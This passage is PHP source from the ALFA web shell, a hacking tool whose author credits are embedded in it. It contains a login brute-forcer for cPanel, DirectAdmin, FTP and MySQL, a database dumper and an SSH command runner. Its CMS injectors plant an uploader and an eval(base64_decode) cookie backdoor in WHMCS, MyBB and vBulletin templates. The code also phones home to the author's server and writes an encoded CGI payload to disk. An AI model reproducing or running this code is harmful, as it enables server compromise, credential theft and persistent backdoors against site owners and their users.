			$v = trim(is_array($v)?$v["key_color"]:$v);
		}
		$array[$k] = $v;
	}
	$file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
	$config = json_encode($array, JSON_PRETTY_PRINT);
	if(!@file_put_contents($file, $config)){
		echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
	}else{
		echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
	}
}
if($_POST['alfa2']=='>>'){
	echo __pre();
	$colors = json_decode($_POST["alfa1"],true);
	$array = "";
	$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
	$glob_colors = $GLOBALS["__ALFA_COLOR__"];
	foreach($glob_colors as $k => $v){
		if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
			$v = trim($colors[$k]);
		}else{
			$v = trim(is_array($v)?$v["key_color"]:$v);
		}
		$array .= '"'.trim($k).'" => "'.$v.'",';
	}
	@chdir($GLOBALS['home_cwd']);
	$basename = @basename($_SERVER['PHP_SELF']);
	$data = @file_get_contents($basename);
	$color = '/\'color\'(.*?)\),/s';
	if(preg_match($color,$data,$e)){
		$new = "'color' => array(".$array."),";
		$data = str_replace($e[0],$new,$data);
		if(@file_put_contents($basename, $data)){
			echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
		}else{
			echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
		}
	}else{
		echo("<center><p><h3>[-] Error...!</h3></p></center>");
	}
}
}
echo('</div>');
alfafooter();
}
function alfaplus(){
alfahead();
echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
try{
$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
$news = new AlfaCURL();
if($news->Send($s1)){
$xml = $news->Send($s1);
}else{
$xml = false;
}
if($xml){
if(@simplexml_load_string($xml)){
$doc = new DOMDocument;
$doc->loadXML($xml);
$data = $doc->getElementsByTagName('data')->item(0);
$items = $data->getElementsByTagName('item');
foreach($items as $item){
$title = $item->getElementsByTagName('title')->item(0)->nodeValue;
$description = $item->getElementsByTagName('description')->item(0)->nodeValue;
$link = $item->getElementsByTagName('link')->item(0)->nodeValue;
$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font  color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
}
}else{
echo($msg);
}
}else{
echo($msg);
}
}catch(Exception $e){
echo $e->getMessage();
}}elseif($_POST['alfa1']=='about'){
echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
<font color='#00A220'>Telegram Channel: @solevisible</font><br>
<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
<font color='#FFFFFF'>Skype : sole.sad</font><br>
<font color='#FF0000'>Persian Gulf For Ever</font><br>
<font color='#FF0000'>Iranian Hackers :)</font><br>
<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
}
echo('</div>');
alfafooter();
}
function alfaDumper(){
alfahead();
echo('<div class="header">');
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
);
create_table($table);
echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
$username = ($_POST['alfa3']);
$password = ($_POST['alfa4']);
$dbname = ($_POST['alfa5']);
$dfile = ($_POST['alfa6']);
$host = ($_POST['alfa7']);
if(!empty($dbname)){
echo __pre();
$msg = "<center>Check this :  <font color='red'>".$dfile."</font></center>";
if(@mysqli_connect($host,$username,$password,$dbname)){
if(strlen(alfaEx("mysqldump"))>0){
alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
echo($msg);
}else{
__alert("Error...!");
}
}else{
echo('<center>mysqli_connect : Error!</center>');
}
}
echo('</div>');
alfafooter();
}
function Alfa_DirectAdmin_Cracker($info){
if(!$info['mysql'])
$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
else $url = $info['protocol'].$info['target'].'/phpmyadmin';
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_CP_Cracker($info){
$url = $info['protocol'].$info['target'].':'.$info['port'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
curl_setopt($curl, CURLOPT_URL, $url);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/filemanager/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_FTP_Cracker($info){
$url = $info['protocol'].$info['target'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/(\d+):(\d+)/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_Mysql_Cracker($info){
if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
CrackerResualt($info);
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
}
}
function Alfa_FTPC($info){
if($con=@ftp_connect($info['target'],$info['port'])){
if($con){
$login=@ftp_login($con,$info['username'],$info['password']);
if($login){CrackerResualt($info);}}}
@ftp_close($con);
}
function CrackerResualt($info){
$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
$c = @fopen($info['fcrack'],'a+');
@fwrite($c, $res);
@fclose($c);
}
function Alfa_Call_Function_Cracker($method,$info){
switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
}
function alfaCrackers(){
alfahead();
AlfaNum(9,10);
echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
echo '</select> Protocol: <select id="protocol" name="protocol">';
foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
$port = $_POST['alfa2'];
$usernames= $_POST['alfa3'];
$passwords = $_POST['alfa4'];
$fcrack = $_POST['alfa5'];
$cracking = $_POST['alfa6'];
$protocol = $_POST['alfa7'];
$loginpanel = $_POST['alfa8'];
$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
if($cracking=='start'){
echo __pre();
$exuser = explode("\n",$usernames);
$expw = explode("\n",$passwords);
foreach($exuser as $user){
foreach($expw as $pw){
$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
Alfa_Call_Function_Cracker($loginpanel,$array);
}
}
echo '<br><font color="red">Attack Finished...</font>';
}
echo '</div>';
alfafooter();
}
function alfassh2(){
if(function_exists('ssh2_connect')){
$_SESSION['connected']= false;
$ssh_ip = $_POST['alfa1'];
$ssh_login = $_POST['alfa2'];
$ssh_pass = $_POST['alfa3'];
$ssh_port = $_POST['alfa4'];
$ssh_command = $_POST['alfa5'];
if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
{
if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
{
$_SESSION['connected']= true;
}
}
if($_SESSION['connected']!== true){
alfahead();
echo "<div class=header>";
echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
alfafooter();
}
if($_SESSION['connected']==true){
alfahead();
echo "<div class=header>";
echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
stream_set_blocking($alfastream,true);
$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
if($_POST['alfa6']=='>>'){
echo '<pre class=ml1>';
ob_start();
echo  stream_get_contents($output);
echo htmlspecialchars(ob_get_clean());
}
echo "</div>";
alfafooter();
}}else{
alfahead();
echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
alfafooter();
}
}
function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
function alfaShellInjectors(){
alfahead();
echo '<div class=header>';
AlfaNum(11);
echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
AlfaNum();
echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = "{php}".ALFA_UPLOADER.";{/php}";
$newin = str_replace("'","\'",$index);
$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version') && $method == 'auto'){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert("shell injectet...");
$ff= 'http://'.$path."/solevisible.php";
output($ff);}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
AlfaNum(1,2,3,5);
echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type=submit value=' '></p></form></center></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$method = $_POST['alfa4'];
$shellCode = "{\${".ALFA_UPLOADER."}}";
$newinshell = str_replace("'","\'",$shellCode);
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$inject = "select template from {$prefix}templates where  title= 'calendar'";
$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
$GetTemp = mysqli_fetch_assoc($result);
$saveDate = $GetTemp['template'];
$repsave = str_replace($shellCode,"",$saveDate);
$repsave = str_replace("'","\'",$repsave);
$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
$geturl = "select value from {$prefix}settings where name= 'bburl'";
$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
$rowb = mysqli_fetch_assoc($findurl);
$furl = $rowb['value'];
$realurl = parse_url($furl,PHP_URL_HOST);
$realpath = parse_url($furl,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/calendar.php");
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/calendar.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
}}}}
if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
AlfaNum(1,2,7,9,10);
echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo '<p><input type="submit" value=" " /></p></form></center>';
if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
$method = $_POST['alfa8'];
$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
$code = str_replace("'","\'",$code);
$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
$getval = @mysqli_fetch_assoc($geturl);
$saveval = $getval['value'];
$realurl = parse_url($saveval,PHP_URL_HOST);
$realpath = parse_url($saveval,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
@fclose($fsock);
}
}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/faq.php");
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/faq.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
echo '</div>';
alfafooter();
}
function alfaupdatepath(){
	if($_POST['path']!=''){
		$_SESSION[__LAST_CWD__] = $_POST['path'];
	}
	echo($_SESSION[__LAST_CWD__]);
}
function alfacheckfiletype(){
	$path = $_POST['path'];
	$arg = $_POST['arg'];
	if(@is_file($path.'/'.$arg)){
		echo("file");
	}else{
		echo("dir");
	}
}
function alfacheckupdate(){
	if(!isset($_COOKIE['alfa_checkupdate'])){
		if(function_exists("curl_version")){
			$update = new AlfaCURL();
			$json = $update->Send("http://solevisible.com/update.json");
			$json = @json_decode($json);
			if($json){
				if(__ALFA_VERSION__ != $json->version){
					@setcookie("alfa_checkupdate", "1", time()+86400);
					echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
				}
			}
		}
	}
}
function alfaWriteTocgiapi($name, $source){
	@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
	@mkdir('alfacgiapi',0755);
	__write_file("alfacgiapi/".$name, __get_resource($source));
	@chmod("alfacgiapi/".$name, 0755);
}
function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
function alfaupdateheader(){
	if(!isset($_SESSION["updateheader_data"])){
		$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
		$realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
		alfaWriteTocgiapi("getheader.alfa",$bash);
